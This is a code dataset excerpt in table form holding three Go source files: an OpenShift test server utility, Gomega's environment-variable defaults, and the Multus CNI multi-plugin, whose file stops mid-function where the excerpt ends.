filename
stringlengths 4
198
| content
stringlengths 25
939k
| environment
list | variablearg
list | constarg
list | variableargjson
stringclasses 1
value | constargjson
stringlengths 2
3.9k
| lang
stringclasses 3
values | constargcount
float64 0
129
⌀ | variableargcount
float64 0
0
⌀ | sentence
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|
test/util/server.go
|
package util
import (
"errors"
"fmt"
"net"
"net/url"
"os"
"path"
"time"
"github.com/golang/glog"
"github.com/openshift/origin/pkg/cmd/server/bootstrappolicy"
kclient "k8s.io/kubernetes/pkg/client"
"k8s.io/kubernetes/pkg/fields"
"k8s.io/kubernetes/pkg/labels"
"k8s.io/kubernetes/pkg/util/wait"
"github.com/openshift/origin/pkg/client"
newproject "github.com/openshift/origin/pkg/cmd/admin/project"
"github.com/openshift/origin/pkg/cmd/server/admin"
configapi "github.com/openshift/origin/pkg/cmd/server/api"
"github.com/openshift/origin/pkg/cmd/server/start"
cmdutil "github.com/openshift/origin/pkg/cmd/util"
"github.com/openshift/origin/pkg/cmd/util/tokencmd"
)
// ServiceAccountWaitTimeout is used to determine how long to wait for the service account
// controllers to start up, and populate the service accounts in the test namespace
const ServiceAccountWaitTimeout = 30 * time.Second
// RequireServer verifies if the etcd, docker and the OpenShift server are
// available and you can successfully connected to them.
func RequireServer() {
RequireEtcd()
RequireDocker()
if _, err := GetClusterAdminClient(KubeConfigPath()); err != nil {
os.Exit(1)
}
}
// GetBaseDir returns the base directory used for test.
func GetBaseDir() string {
return cmdutil.Env("BASETMPDIR", path.Join(os.TempDir(), "openshift-"+Namespace()))
}
// FindAvailableBindAddress returns a bind address on 127.0.0.1 with a free port in the low-high range.
// If lowPort is 0, an ephemeral port is allocated.
func FindAvailableBindAddress(lowPort, highPort int) (string, error) {
if highPort < lowPort {
return "", errors.New("lowPort must be <= highPort")
}
for port := lowPort; port <= highPort; port++ {
l, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", port))
if err != nil {
if port == 0 {
// Only get one shot to get an ephemeral port
return "", err
}
continue
}
defer l.Close()
return l.Addr().String(), nil
}
return "", fmt.Errorf("Could not find available port in the range %d-%d", lowPort, highPort)
}
func setupStartOptions() (*start.MasterArgs, *start.NodeArgs, *start.ListenArg, *start.ImageFormatArgs, *start.KubeConnectionArgs) {
masterArgs, nodeArgs, listenArg, imageFormatArgs, kubeConnectionArgs := start.GetAllInOneArgs()
basedir := GetBaseDir()
nodeArgs.VolumeDir = path.Join(basedir, "volume")
masterArgs.EtcdDir = path.Join(basedir, "etcd")
masterArgs.ConfigDir.Default(path.Join(basedir, "openshift.local.config", "master"))
nodeArgs.ConfigDir.Default(path.Join(basedir, "openshift.local.config", nodeArgs.NodeName))
nodeArgs.MasterCertDir = masterArgs.ConfigDir.Value()
// don't wait for nodes to come up
masterAddr := os.Getenv("OS_MASTER_ADDR")
if len(masterAddr) == 0 {
if addr, err := FindAvailableBindAddress(8443, 8999); err != nil {
glog.Fatalf("Couldn't find free address for master: %v", err)
} else {
masterAddr = addr
}
}
fmt.Printf("masterAddr: %#v\n", masterAddr)
masterArgs.MasterAddr.Set(masterAddr)
listenArg.ListenAddr.Set(masterAddr)
masterArgs.EtcdAddr.Set(GetEtcdURL())
dnsAddr := os.Getenv("OS_DNS_ADDR")
if len(dnsAddr) == 0 {
if addr, err := FindAvailableBindAddress(8053, 8100); err != nil {
glog.Fatalf("Couldn't find free address for DNS: %v", err)
} else {
dnsAddr = addr
}
}
fmt.Printf("dnsAddr: %#v\n", dnsAddr)
masterArgs.DNSBindAddr.Set(dnsAddr)
return masterArgs, nodeArgs, listenArg, imageFormatArgs, kubeConnectionArgs
}
func DefaultMasterOptions() (*configapi.MasterConfig, error) {
startOptions := start.MasterOptions{}
startOptions.MasterArgs, _, _, _, _ = setupStartOptions()
startOptions.Complete()
startOptions.MasterArgs.ConfigDir.Default(path.Join(GetBaseDir(), "openshift.local.config", "master"))
if err := CreateMasterCerts(startOptions.MasterArgs); err != nil {
return nil, err
}
if err := CreateBootstrapPolicy(startOptions.MasterArgs); err != nil {
return nil, err
}
masterConfig, err := startOptions.MasterArgs.BuildSerializeableMasterConfig()
if err != nil {
return nil, err
}
// force strict handling of service account secret references by default, so that all our examples and controllers will handle it.
masterConfig.ServiceAccountConfig.LimitSecretReferences = true
return masterConfig, nil
}
func CreateBootstrapPolicy(masterArgs *start.MasterArgs) error {
createBootstrapPolicy := &admin.CreateBootstrapPolicyFileOptions{
File: path.Join(masterArgs.ConfigDir.Value(), "policy.json"),
OpenShiftSharedResourcesNamespace: "openshift",
}
if err := createBootstrapPolicy.Validate(nil); err != nil {
return err
}
if err := createBootstrapPolicy.CreateBootstrapPolicyFile(); err != nil {
return err
}
return nil
}
func CreateMasterCerts(masterArgs *start.MasterArgs) error {
hostnames, err := masterArgs.GetServerCertHostnames()
if err != nil {
return err
}
masterURL, err := masterArgs.GetMasterAddress()
if err != nil {
return err
}
publicMasterURL, err := masterArgs.GetMasterPublicAddress()
if err != nil {
return err
}
createMasterCerts := admin.CreateMasterCertsOptions{
CertDir: masterArgs.ConfigDir.Value(),
SignerName: admin.DefaultSignerName(),
Hostnames: hostnames.List(),
APIServerURL: masterURL.String(),
PublicAPIServerURL: publicMasterURL.String(),
Output: os.Stderr,
}
if err := createMasterCerts.Validate(nil); err != nil {
return err
}
if err := createMasterCerts.CreateMasterCerts(); err != nil {
return err
}
return nil
}
func CreateNodeCerts(nodeArgs *start.NodeArgs) error {
getSignerOptions := &admin.SignerCertOptions{
CertFile: admin.DefaultCertFilename(nodeArgs.MasterCertDir, "ca"),
KeyFile: admin.DefaultKeyFilename(nodeArgs.MasterCertDir, "ca"),
SerialFile: admin.DefaultSerialFilename(nodeArgs.MasterCertDir, "ca"),
}
createNodeConfig := admin.NewDefaultCreateNodeConfigOptions()
createNodeConfig.Output = os.Stdout
createNodeConfig.SignerCertOptions = getSignerOptions
createNodeConfig.NodeConfigDir = nodeArgs.ConfigDir.Value()
createNodeConfig.NodeName = nodeArgs.NodeName
createNodeConfig.Hostnames = []string{nodeArgs.NodeName}
createNodeConfig.ListenAddr = nodeArgs.ListenArg.ListenAddr
createNodeConfig.APIServerCAFile = admin.DefaultCertFilename(nodeArgs.MasterCertDir, "ca")
createNodeConfig.NodeClientCAFile = admin.DefaultCertFilename(nodeArgs.MasterCertDir, "ca")
if err := createNodeConfig.Validate(nil); err != nil {
return err
}
if err := createNodeConfig.CreateNodeFolder(); err != nil {
return err
}
return nil
}
func DefaultAllInOneOptions() (*configapi.MasterConfig, *configapi.NodeConfig, error) {
startOptions := start.AllInOneOptions{MasterOptions: &start.MasterOptions{}, NodeArgs: &start.NodeArgs{}}
startOptions.MasterOptions.MasterArgs, startOptions.NodeArgs, _, _, _ = setupStartOptions()
startOptions.MasterOptions.MasterArgs.NodeList = nil
startOptions.NodeArgs.AllowDisabledDocker = true
startOptions.Complete()
startOptions.MasterOptions.MasterArgs.ConfigDir.Default(path.Join(GetBaseDir(), "openshift.local.config", "master"))
startOptions.NodeArgs.ConfigDir.Default(path.Join(GetBaseDir(), "openshift.local.config", admin.DefaultNodeDir(startOptions.NodeArgs.NodeName)))
startOptions.NodeArgs.MasterCertDir = startOptions.MasterOptions.MasterArgs.ConfigDir.Value()
if err := CreateMasterCerts(startOptions.MasterOptions.MasterArgs); err != nil {
return nil, nil, err
}
if err := CreateBootstrapPolicy(startOptions.MasterOptions.MasterArgs); err != nil {
return nil, nil, err
}
if err := CreateNodeCerts(startOptions.NodeArgs); err != nil {
return nil, nil, err
}
masterOptions, err := startOptions.MasterOptions.MasterArgs.BuildSerializeableMasterConfig()
if err != nil {
return nil, nil, err
}
nodeOptions, err := startOptions.NodeArgs.BuildSerializeableNodeConfig()
if err != nil {
return nil, nil, err
}
return masterOptions, nodeOptions, nil
}
func StartConfiguredAllInOne(masterConfig *configapi.MasterConfig, nodeConfig *configapi.NodeConfig) (string, error) {
adminKubeConfigFile, err := StartConfiguredMaster(masterConfig)
if err != nil {
return "", err
}
if err := start.StartNode(*nodeConfig); err != nil {
return "", err
}
return adminKubeConfigFile, nil
}
func StartTestAllInOne() (*configapi.MasterConfig, *configapi.NodeConfig, string, error) {
master, node, err := DefaultAllInOneOptions()
if err != nil {
return nil, nil, "", err
}
adminKubeConfigFile, err := StartConfiguredAllInOne(master, node)
return master, node, adminKubeConfigFile, err
}
type TestOptions struct {
DeleteAllEtcdKeys bool
}
func DefaultTestOptions() TestOptions {
return TestOptions{true}
}
func StartConfiguredMaster(masterConfig *configapi.MasterConfig) (string, error) {
return StartConfiguredMasterWithOptions(masterConfig, DefaultTestOptions())
}
func StartConfiguredMasterWithOptions(masterConfig *configapi.MasterConfig, testOptions TestOptions) (string, error) {
if testOptions.DeleteAllEtcdKeys {
DeleteAllEtcdKeys()
}
if err := start.NewMaster(masterConfig, true, true).Start(); err != nil {
return "", err
}
adminKubeConfigFile := KubeConfigPath()
clientConfig, err := GetClusterAdminClientConfig(adminKubeConfigFile)
if err != nil {
return "", err
}
masterURL, err := url.Parse(clientConfig.Host)
if err != nil {
return "", err
}
// wait for the server to come up: 35 seconds
if err := cmdutil.WaitForSuccessfulDial(true, "tcp", masterURL.Host, 100*time.Millisecond, 1*time.Second, 35); err != nil {
return "", err
}
for {
// confirm that we can actually query from the api server
if client, err := GetClusterAdminClient(adminKubeConfigFile); err == nil {
if _, err := client.ClusterPolicies().List(labels.Everything(), fields.Everything()); err == nil {
break
}
}
time.Sleep(100 * time.Millisecond)
}
return adminKubeConfigFile, nil
}
// StartTestMaster starts up a test master and returns back the startOptions so you can get clients and certs
func StartTestMaster() (*configapi.MasterConfig, string, error) {
master, err := DefaultMasterOptions()
if err != nil {
return nil, "", err
}
adminKubeConfigFile, err := StartConfiguredMaster(master)
return master, adminKubeConfigFile, err
}
func WaitForServiceAccounts(client *kclient.Client, namespace string, accounts []string) error {
// Ensure the service accounts needed by build pods exist in the namespace
// The extra controllers tend to starve the service account controller
serviceAccounts := client.ServiceAccounts(namespace)
return wait.Poll(time.Second, ServiceAccountWaitTimeout, func() (bool, error) {
for _, account := range accounts {
if _, err := serviceAccounts.Get(account); err != nil {
return false, nil
}
}
return true, nil
})
}
// CreateNewProject creates a new project using the clusterAdminClient, then gets a token for the adminUser and returns
// back a client for the admin user
func CreateNewProject(clusterAdminClient *client.Client, clientConfig kclient.Config, projectName, adminUser string) (*client.Client, error) {
newProjectOptions := &newproject.NewProjectOptions{
Client: clusterAdminClient,
ProjectName: projectName,
AdminRole: bootstrappolicy.AdminRoleName,
AdminUser: adminUser,
}
if err := newProjectOptions.Run(false); err != nil {
return nil, err
}
client, _, _, err := GetClientForUser(clientConfig, adminUser)
return client, err
}
func GetClientForUser(clientConfig kclient.Config, username string) (*client.Client, *kclient.Client, *kclient.Config, error) {
token, err := tokencmd.RequestToken(&clientConfig, nil, username, "password")
if err != nil {
return nil, nil, nil, err
}
userClientConfig := clientConfig
userClientConfig.BearerToken = token
userClientConfig.Username = ""
userClientConfig.Password = ""
userClientConfig.TLSClientConfig.CertFile = ""
userClientConfig.TLSClientConfig.KeyFile = ""
userClientConfig.TLSClientConfig.CertData = nil
userClientConfig.TLSClientConfig.KeyData = nil
kubeClient, err := kclient.New(&userClientConfig)
if err != nil {
return nil, nil, nil, err
}
osClient, err := client.New(&userClientConfig)
if err != nil {
return nil, nil, nil, err
}
return osClient, kubeClient, &userClientConfig, nil
}
|
[
"\"OS_MASTER_ADDR\"",
"\"OS_DNS_ADDR\""
] |
[] |
[
"OS_DNS_ADDR",
"OS_MASTER_ADDR"
] |
[]
|
["OS_DNS_ADDR", "OS_MASTER_ADDR"]
|
go
| 2 | 0 | |
vendor/github.com/onsi/gomega/env.go
|
package gomega
import (
"os"
"github.com/onsi/gomega/internal/defaults"
)
const (
ConsistentlyDurationEnvVarName = "GOMEGA_DEFAULT_CONSISTENTLY_DURATION"
ConsistentlyPollingIntervalEnvVarName = "GOMEGA_DEFAULT_CONSISTENTLY_POLLING_INTERVAL"
EventuallyTimeoutEnvVarName = "GOMEGA_DEFAULT_EVENTUALLY_TIMEOUT"
EventuallyPollingIntervalEnvVarName = "GOMEGA_DEFAULT_EVENTUALLY_POLLING_INTERVAL"
)
func init() {
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultConsistentlyDuration,
ConsistentlyDurationEnvVarName,
)
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultConsistentlyPollingInterval,
ConsistentlyPollingIntervalEnvVarName,
)
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultEventuallyTimeout,
EventuallyTimeoutEnvVarName,
)
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultEventuallyPollingInterval,
EventuallyPollingIntervalEnvVarName,
)
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| 0 | 0 | |
multus/multus.go
|
// Copyright (c) 2017 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// This is a "Multi-plugin".The delegate concept refered from CNI project
// It reads other plugin netconf, and then invoke them, e.g.
// flannel or sriov plugin.
package main
import (
"context"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"net"
"os"
"path/filepath"
"strings"
"time"
"github.com/containernetworking/cni/libcni"
"github.com/containernetworking/cni/pkg/invoke"
"github.com/containernetworking/cni/pkg/skel"
cnitypes "github.com/containernetworking/cni/pkg/types"
cniversion "github.com/containernetworking/cni/pkg/version"
"github.com/containernetworking/plugins/pkg/ns"
k8s "github.com/intel/multus-cni/k8sclient"
"github.com/intel/multus-cni/logging"
"github.com/intel/multus-cni/netutils"
"github.com/intel/multus-cni/types"
nettypes "github.com/k8snetworkplumbingwg/network-attachment-definition-client/pkg/apis/k8s.cni.cncf.io/v1"
nadutils "github.com/k8snetworkplumbingwg/network-attachment-definition-client/pkg/utils"
"github.com/vishvananda/netlink"
"k8s.io/apimachinery/pkg/util/wait"
)
var version = "master@git"
var commit = "unknown commit"
var date = "unknown date"
var defaultReadinessBackoff = wait.Backoff{
Steps: 4,
Duration: 250 * time.Millisecond,
Factor: 4.0,
Jitter: 0.1,
}
func printVersionString() string {
return fmt.Sprintf("multus-cni version:%s, commit:%s, date:%s",
version, commit, date)
}
func saveScratchNetConf(containerID, dataDir string, netconf []byte) error {
logging.Debugf("saveScratchNetConf: %s, %s, %s", containerID, dataDir, string(netconf))
if err := os.MkdirAll(dataDir, 0700); err != nil {
return logging.Errorf("saveScratchNetConf: failed to create the multus data directory(%q): %v", dataDir, err)
}
path := filepath.Join(dataDir, containerID)
err := ioutil.WriteFile(path, netconf, 0600)
if err != nil {
return logging.Errorf("saveScratchNetConf: failed to write container data in the path(%q): %v", path, err)
}
return err
}
func consumeScratchNetConf(containerID, dataDir string) ([]byte, string, error) {
logging.Debugf("consumeScratchNetConf: %s, %s", containerID, dataDir)
path := filepath.Join(dataDir, containerID)
b, err := ioutil.ReadFile(path)
return b, path, err
}
func getIfname(delegate *types.DelegateNetConf, argif string, idx int) string {
logging.Debugf("getIfname: %v, %s, %d", delegate, argif, idx)
if delegate.IfnameRequest != "" {
return delegate.IfnameRequest
}
if delegate.MasterPlugin {
// master plugin always uses the CNI-provided interface name
return argif
}
// Otherwise construct a unique interface name from the delegate's
// position in the delegate list
return fmt.Sprintf("net%d", idx)
}
func saveDelegates(containerID, dataDir string, delegates []*types.DelegateNetConf) error {
logging.Debugf("saveDelegates: %s, %s, %v", containerID, dataDir, delegates)
delegatesBytes, err := json.Marshal(delegates)
if err != nil {
return logging.Errorf("saveDelegates: error serializing delegate netconf: %v", err)
}
if err = saveScratchNetConf(containerID, dataDir, delegatesBytes); err != nil {
return logging.Errorf("saveDelegates: error in saving the delegates : %v", err)
}
return err
}
func deleteDelegates(containerID, dataDir string) error {
logging.Debugf("deleteDelegates: %s, %s", containerID, dataDir)
path := filepath.Join(dataDir, containerID)
if err := os.Remove(path); err != nil {
return logging.Errorf("deleteDelegates: error in deleting the delegates : %v", err)
}
return nil
}
func validateIfName(nsname string, ifname string) error {
logging.Debugf("validateIfName: %s, %s", nsname, ifname)
podNs, err := ns.GetNS(nsname)
if err != nil {
return logging.Errorf("validateIfName: no net namespace %s found: %v", nsname, err)
}
err = podNs.Do(func(_ ns.NetNS) error {
_, err := netlink.LinkByName(ifname)
if err != nil {
if err.Error() == "Link not found" {
return nil
}
return err
}
return logging.Errorf("validateIfName: interface name %s already exists", ifname)
})
return err
}
func confAdd(rt *libcni.RuntimeConf, rawNetconf []byte, binDir string, exec invoke.Exec) (cnitypes.Result, error) {
logging.Debugf("conflistAdd: %v, %s, %s", rt, string(rawNetconf), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
conf, err := libcni.ConfFromBytes(rawNetconf)
if err != nil {
return nil, logging.Errorf("error in converting the raw bytes to conf: %v", err)
}
result, err := cniNet.AddNetwork(context.Background(), conf, rt)
if err != nil {
return nil, logging.Errorf("error in getting result from AddNetwork: %v", err)
}
return result, nil
}
func confDel(rt *libcni.RuntimeConf, rawNetconf []byte, binDir string, exec invoke.Exec) error {
logging.Debugf("conflistDel: %v, %s, %s", rt, string(rawNetconf), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
conf, err := libcni.ConfFromBytes(rawNetconf)
if err != nil {
return logging.Errorf("error in converting the raw bytes to conf: %v", err)
}
err = cniNet.DelNetwork(context.Background(), conf, rt)
if err != nil {
return logging.Errorf("error in getting result from DelNetwork: %v", err)
}
return err
}
func conflistAdd(rt *libcni.RuntimeConf, rawnetconflist []byte, binDir string, exec invoke.Exec) (cnitypes.Result, error) {
logging.Debugf("conflistAdd: %v, %s, %s", rt, string(rawnetconflist), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
confList, err := libcni.ConfListFromBytes(rawnetconflist)
if err != nil {
return nil, logging.Errorf("conflistAdd: error converting the raw bytes into a conflist: %v", err)
}
result, err := cniNet.AddNetworkList(context.Background(), confList, rt)
if err != nil {
return nil, logging.Errorf("conflistAdd: error in getting result from AddNetworkList: %v", err)
}
return result, nil
}
func conflistDel(rt *libcni.RuntimeConf, rawnetconflist []byte, binDir string, exec invoke.Exec) error {
logging.Debugf("conflistDel: %v, %s, %s", rt, string(rawnetconflist), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
confList, err := libcni.ConfListFromBytes(rawnetconflist)
if err != nil {
return logging.Errorf("conflistDel: error converting the raw bytes into a conflist: %v", err)
}
err = cniNet.DelNetworkList(context.Background(), confList, rt)
if err != nil {
return logging.Errorf("conflistDel: error in getting result from DelNetworkList: %v", err)
}
return err
}
func delegateAdd(exec invoke.Exec, ifName string, delegate *types.DelegateNetConf, rt *libcni.RuntimeConf, binDir string, cniArgs string) (cnitypes.Result, error) {
logging.Debugf("delegateAdd: %v, %s, %v, %v, %s", exec, ifName, delegate, rt, binDir)
if os.Setenv("CNI_IFNAME", ifName) != nil {
return nil, logging.Errorf("delegateAdd: error setting envionment variable CNI_IFNAME")
}
if err := validateIfName(os.Getenv("CNI_NETNS"), ifName); err != nil {
return nil, logging.Errorf("delegateAdd: cannot set %q interface name to %q: %v", delegate.Conf.Type, ifName, err)
}
// Deprecated in ver 3.5.
if delegate.MacRequest != "" || delegate.IPRequest != nil {
if cniArgs != "" {
cniArgs = fmt.Sprintf("%s;IgnoreUnknown=true", cniArgs)
} else {
cniArgs = "IgnoreUnknown=true"
}
if delegate.MacRequest != "" {
// validate Mac address
_, err := net.ParseMAC(delegate.MacRequest)
if err != nil {
return nil, logging.Errorf("delegateAdd: failed to parse mac address %q", delegate.MacRequest)
}
cniArgs = fmt.Sprintf("%s;MAC=%s", cniArgs, delegate.MacRequest)
logging.Debugf("delegateAdd: set MAC address %q to %q", delegate.MacRequest, ifName)
rt.Args = append(rt.Args, [2]string{"MAC", delegate.MacRequest})
}
if delegate.IPRequest != nil {
// validate IP address
for _, ip := range delegate.IPRequest {
if strings.Contains(ip, "/") {
_, _, err := net.ParseCIDR(ip)
if err != nil {
return nil, logging.Errorf("delegateAdd: failed to parse IP address %q", ip)
}
} else if net.ParseIP(ip) == nil {
return nil, logging.Errorf("delegateAdd: failed to parse IP address %q", ip)
}
}
ips := strings.Join(delegate.IPRequest, ",")
cniArgs = fmt.Sprintf("%s;IP=%s", cniArgs, ips)
logging.Debugf("delegateAdd: set IP address %q to %q", ips, ifName)
rt.Args = append(rt.Args, [2]string{"IP", ips})
}
}
var result cnitypes.Result
var err error
if delegate.ConfListPlugin {
result, err = conflistAdd(rt, delegate.Bytes, binDir, exec)
if err != nil {
return nil, logging.Errorf("delegateAdd: error invoking conflistAdd - %q: %v", delegate.ConfList.Name, err)
}
} else {
result, err = confAdd(rt, delegate.Bytes, binDir, exec)
if err != nil {
return nil, logging.Errorf("delegateAdd: error invoking DelegateAdd - %q: %v", delegate.Conf.Type, err)
}
}
if logging.GetLoggingLevel() >= logging.VerboseLevel {
data, _ := json.Marshal(result)
var confName string
if delegate.ConfListPlugin {
confName = delegate.ConfList.Name
} else {
confName = delegate.Conf.Name
}
logging.Verbosef("Add: %s:%s:%s:%s %s", rt.Args[1][1], rt.Args[2][1], confName, rt.IfName, string(data))
}
return result, nil
}
func delegateDel(exec invoke.Exec, ifName string, delegateConf *types.DelegateNetConf, rt *libcni.RuntimeConf, binDir string) error {
logging.Debugf("delegateDel: %v, %s, %v, %v, %s", exec, ifName, delegateConf, rt, binDir)
if os.Setenv("CNI_IFNAME", ifName) != nil {
return logging.Errorf("delegateDel: error setting envionment variable CNI_IFNAME")
}
if logging.GetLoggingLevel() >= logging.VerboseLevel {
var confName string
if delegateConf.ConfListPlugin {
confName = delegateConf.ConfList.Name
} else {
confName = delegateConf.Conf.Name
}
logging.Verbosef("Del: %s:%s:%s:%s %s", rt.Args[1][1], rt.Args[2][1], confName, rt.IfName, string(delegateConf.Bytes))
}
var err error
if delegateConf.ConfListPlugin {
err = conflistDel(rt, delegateConf.Bytes, binDir, exec)
if err != nil {
return logging.Errorf("delegateDel: error invoking ConflistDel - %q: %v", delegateConf.ConfList.Name, err)
}
} else {
err = confDel(rt, delegateConf.Bytes, binDir, exec)
if err != nil {
return logging.Errorf("delegateDel: error invoking DelegateDel - %q: %v", delegateConf.Conf.Type, err)
}
}
return err
}
func delPlugins(exec invoke.Exec, argIfname string, delegates []*types.DelegateNetConf, lastIdx int, rt *libcni.RuntimeConf, binDir string) error {
logging.Debugf("delPlugins: %v, %s, %v, %d, %v, %s", exec, argIfname, delegates, lastIdx, rt, binDir)
if os.Setenv("CNI_COMMAND", "DEL") != nil {
return logging.Errorf("delPlugins: error setting envionment variable CNI_COMMAND to a value of DEL")
}
var errorstrings []string
for idx := lastIdx; idx >= 0; idx-- {
ifName := getIfname(delegates[idx], argIfname, idx)
rt.IfName = ifName
// Attempt to delete all but do not error out, instead, collect all errors.
if err := delegateDel(exec, ifName, delegates[idx], rt, binDir); err != nil {
errorstrings = append(errorstrings, err.Error())
}
}
// Check if we had any errors, and send them all back.
if len(errorstrings) > 0 {
return fmt.Errorf(strings.Join(errorstrings, " / "))
}
return nil
}
func cmdErr(k8sArgs *types.K8sArgs, format string, args ...interface{}) error {
prefix := "Multus: "
if k8sArgs != nil {
prefix += fmt.Sprintf("[%s/%s]: ", k8sArgs.K8S_POD_NAMESPACE, k8sArgs.K8S_POD_NAME)
}
return logging.Errorf(prefix+format, args...)
}
func cmdAdd(args *skel.CmdArgs, exec invoke.Exec, kubeClient *k8s.ClientInfo) (cnitypes.Result, error) {
n, err := types.LoadNetConf(args.StdinData)
logging.Debugf("cmdAdd: %v, %v, %v", args, exec, kubeClient)
if err != nil {
return nil, cmdErr(nil, "error loading netconf: %v", err)
}
k8sArgs, err := k8s.GetK8sArgs(args)
if err != nil {
return nil, cmdErr(nil, "error getting k8s args: %v", err)
}
wait.ExponentialBackoff(defaultReadinessBackoff, func() (bool, error) {
_, err := os.Stat(n.ReadinessIndicatorFile)
switch {
case err == nil:
return true, nil
default:
return false, nil
}
})
if n.ClusterNetwork != "" {
err = k8s.GetDefaultNetworks(k8sArgs, n, kubeClient)
if err != nil {
return nil, cmdErr(k8sArgs, "failed to get clusterNetwork/defaultNetworks: %v", err)
}
// First delegate is always the master plugin
n.Delegates[0].MasterPlugin = true
}
_, kc, err := k8s.TryLoadPodDelegates(k8sArgs, n, kubeClient)
if err != nil {
return nil, cmdErr(k8sArgs, "error loading k8s delegates k8s args: %v", err)
}
// cache the multus config
if err := saveDelegates(args.ContainerID, n.CNIDir, n.Delegates); err != nil {
return nil, cmdErr(k8sArgs, "error saving the delegates: %v", err)
}
var result, tmpResult cnitypes.Result
var netStatus []nettypes.NetworkStatus
cniArgs := os.Getenv("CNI_ARGS")
for idx, delegate := range n.Delegates {
ifName := getIfname(delegate, args.IfName, idx)
runtimeConfig := types.MergeCNIRuntimeConfig(n.RuntimeConfig, delegate)
rt := types.CreateCNIRuntimeConf(args, k8sArgs, ifName, runtimeConfig)
tmpResult, err = delegateAdd(exec, ifName, delegate, rt, n.BinDir, cniArgs)
if err != nil {
// If the add failed, tear down all networks we already added
netName := delegate.Conf.Name
if netName == "" {
netName = delegate.ConfList.Name
}
// Ignore errors; DEL must be idempotent anyway
_ = delPlugins(exec, args.IfName, n.Delegates, idx, rt, n.BinDir)
return nil, cmdErr(k8sArgs, "error adding container to network %q: %v", netName, err)
}
// Remove gateway from routing table if the gateway is not used
deletegateway := false
adddefaultgateway := false
if delegate.IsFilterGateway {
deletegateway = true
logging.Debugf("Marked interface %v for gateway deletion", ifName)
} else {
// Otherwise, determine if this interface now gets our default route.
if delegate.GatewayRequest != nil {
deletegateway = true
adddefaultgateway = true
logging.Debugf("Detected gateway override on interface %v to %v", ifName, delegate.GatewayRequest)
}
}
if deletegateway {
tmpResult, err = netutils.DeleteDefaultGW(args, ifName, &tmpResult)
if err != nil {
return nil, cmdErr(k8sArgs, "error deleting default gateway: %v", err)
}
}
// Here we'll set the default gateway
if adddefaultgateway {
tmpResult, err = netutils.SetDefaultGW(args, ifName, delegate.GatewayRequest, &tmpResult)
if err != nil {
return nil, cmdErr(k8sArgs, "error setting default gateway: %v", err)
}
}
// Master plugin result is always used if present
if delegate.MasterPlugin || result == nil {
result = tmpResult
}
//create the network status, only in case Multus as kubeconfig
if n.Kubeconfig != "" && kc != nil {
if !types.CheckSystemNamespaces(string(k8sArgs.K8S_POD_NAME), n.SystemNamespaces) {
delegateNetStatus, err := nadutils.CreateNetworkStatus(tmpResult, delegate.Conf.Name, delegate.MasterPlugin)
if err != nil {
return nil, cmdErr(k8sArgs, "error setting network status: %v", err)
}
netStatus = append(netStatus, *delegateNetStatus)
}
}
}
//set the network status annotation in apiserver, only in case Multus as kubeconfig
if n.Kubeconfig != "" && kc != nil {
if !types.CheckSystemNamespaces(string(k8sArgs.K8S_POD_NAME), n.SystemNamespaces) {
err = k8s.SetNetworkStatus(kubeClient, k8sArgs, netStatus, n)
if err != nil {
return nil, cmdErr(k8sArgs, "error setting the networks status: %v", err)
}
}
}
return result, nil
}
func cmdGet(args *skel.CmdArgs, exec invoke.Exec, kubeClient *k8s.ClientInfo) (cnitypes.Result, error) {
logging.Debugf("cmdGet: %v, %v, %v", args, exec, kubeClient)
in, err := types.LoadNetConf(args.StdinData)
if err != nil {
return nil, err
}
// FIXME: call all delegates
return in.PrevResult, nil
}
func cmdDel(args *skel.CmdArgs, exec invoke.Exec, kubeClient *k8s.ClientInfo) error {
logging.Debugf("cmdDel: %v, %v, %v", args, exec, kubeClient)
in, err := types.LoadNetConf(args.StdinData)
if err != nil {
return err
}
netnsfound := true
netns, err := ns.GetNS(args.Netns)
if err != nil {
// if NetNs is passed down by the Cloud Orchestration Engine, or if it called multiple times
// so don't return an error if the device is already removed.
// https://github.com/kubernetes/kubernetes/issues/43014#issuecomment-287164444
_, ok := err.(ns.NSPathNotExistErr)
if ok {
netnsfound = false
logging.Debugf("cmdDel: WARNING netns may not exist, netns: %s, err: %s", args.Netns, err)
} else {
return cmdErr(nil, "failed to open netns %q: %v", netns, err)
}
}
if netns != nil {
defer netns.Close()
}
k8sArgs, err := k8s.GetK8sArgs(args)
if err != nil {
return cmdErr(nil, "error getting k8s args: %v", err)
}
// Read the cache to get delegates json for the pod
netconfBytes, path, err := consumeScratchNetConf(args.ContainerID, in.CNIDir)
if err != nil {
// Fetch delegates again if cache is not exist
if os.IsNotExist(err) {
if in.ClusterNetwork != "" {
err = k8s.GetDefaultNetworks(k8sArgs, in, kubeClient)
if err != nil {
return cmdErr(k8sArgs, "failed to get clusterNetwork/defaultNetworks: %v", err)
}
// First delegate is always the master plugin
in.Delegates[0].MasterPlugin = true
}
// Get pod annotation and so on
_, _, err := k8s.TryLoadPodDelegates(k8sArgs, in, kubeClient)
